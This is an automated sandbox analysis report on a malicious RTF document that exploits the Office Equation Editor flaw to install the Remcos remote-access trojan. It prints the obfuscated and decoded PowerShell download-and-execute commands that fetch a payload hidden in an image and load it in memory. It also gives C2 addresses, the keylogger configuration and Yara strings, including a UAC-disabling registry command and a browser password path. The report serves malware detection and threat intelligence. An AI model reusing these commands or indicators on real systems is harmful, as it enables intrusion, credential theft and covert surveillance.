Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xnHel.rtf

Overview

General Information

Sample name:xnHel.rtf
Analysis ID:1509586
MD5:0cedaf043bf1a0c4ccef486f9ec8cbd2
SHA1:d765d29e6a05ba6e72b8d718ade5f32f1379ebe5
SHA256:c34202144bc27f5a4ee328d03412eecc9241d75c4bffa44f40a41ce5c7340b0c
Tags:HUNrtf
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Found potential equation exploit (CVE-2017-11882)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3260 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3340 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3488 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3536 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?TwBm? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwBl? ? ? ? ?C? ? ? ? ?? ? ? ? ?M? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?Kw? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?u? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BM? ? ? ? ?GU? ? ? ? ?bgBn? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?FM? ? ? ? ?dQBi? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBD? ? ? ? ?G8? ? ? ? ?bgB2? ? ? ? ?GU? ? ? ? ?cgB0? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?EY? ? ? ? ?cgBv? ? ? ? ?G0? ? ? ? ?QgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GQ? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBS? ? ? ? ?GU? ? ? ? ?ZgBs? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Gk? ? ? ? ?bwBu? ? ? ? ?C4? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?Ew? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BU? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?Cg? ? ? ? ?JwBk? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GI? ? ? ? ?LgBJ? ? ? ? ?E8? ? ? ? ?LgBI? ? ? ? ?G8? ? ? ? ?bQBl? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?bQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B0? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?TQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?FY? ? ? ? ?QQBJ? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgB2? ? ? ? ?G8? ? ? ? ?awBl? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bu? ? ? ? ?HU? ? ? ? ?b? ? ? ? ?Bs? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?G8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Fs? ? ? ? ?XQBd? ? ? ? ?C? ? ? ? ?? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?HQ? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?BT? ? ? ? ?E8? ? ? ? ?TgBV? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?y? ? ? ? ?DQ? ? ? ? ?Lw? ? ? ? ?z? ? ? ? ?DI? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?Dk? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?D? ? ? ? ?? ? ? ? ?OQ? ? ? ? ?u? ? ? ? ?DU? ? ? ? ?N? ? ? ? ?? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?OgBw? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?L? ? ? ? ?? ? ? ? ?n? ? ? ? ?FI? ? ? ? ?ZQBn? ? ? ? ?EE? ? ? ? ?cwBt? ? ? ? ?Cc? ? ? ? ?L? ? ? ? ?? ? ? ? ?n? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?p? ? ? ? ?? ? ? ? ?==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3644 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • RegAsm.exe (PID: 3752 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Version": "5.1.1 Pro", "Host:Port:Password": "45.90.89.98:8243", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-O0U3JA", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
xnHel.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1ada:$obj1: \objhtml
  • 0x1b15:$obj2: \objdata
  • 0x1aff:$obj3: \objupdate

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Desktop\~WRD0000.tmpINDICATOR_RTF_EXPLOIT_CVE_2017_8759_2detects CVE-2017-8759 weaponized RTF documents.ditekSHen
  • 0xc673:$clsid3: 4d73786d6c322e534158584d4c5265616465722e
  • 0xc6bd:$ole2: d0cf11e0a1b11ae1
  • 0x6c83:$obj2: \objdata
  • 0x6c61:$obj4: \objemb

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.906391209.0000000000911000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6c4b8:$a1: Remcos restarted by watchdog!
          • 0x6ca30:$a3: %02i:%02i:%02i:%03i
          Click to see the 19 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          9.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            9.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              9.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                9.2.RegAsm.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x6c4b8:$a1: Remcos restarted by watchdog!
                • 0x6ca30:$a3: %02i:%02i:%02i:%03i
                9.2.RegAsm.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
                • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x6657c:$str_b2: Executing file:
                • 0x675fc:$str_b3: GetDirectListeningPort
                • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x67128:$str_b7: \update.vbs
                • 0x665a4:$str_b9: Downloaded file:
                • 0x66590:$str_b10: Downloading file:
                • 0x66634:$str_b12: Failed to upload file:
                • 0x675c4:$str_b13: StartForward
                • 0x675e4:$str_b14: StopForward
                • 0x67080:$str_b15: fso.DeleteFile "
                • 0x67014:$str_b16: On Error Resume Next
                • 0x670b0:$str_b17: fso.DeleteFolder "
                • 0x66624:$str_b18: Uploaded file:
                • 0x665e4:$str_b19: Unable to delete:
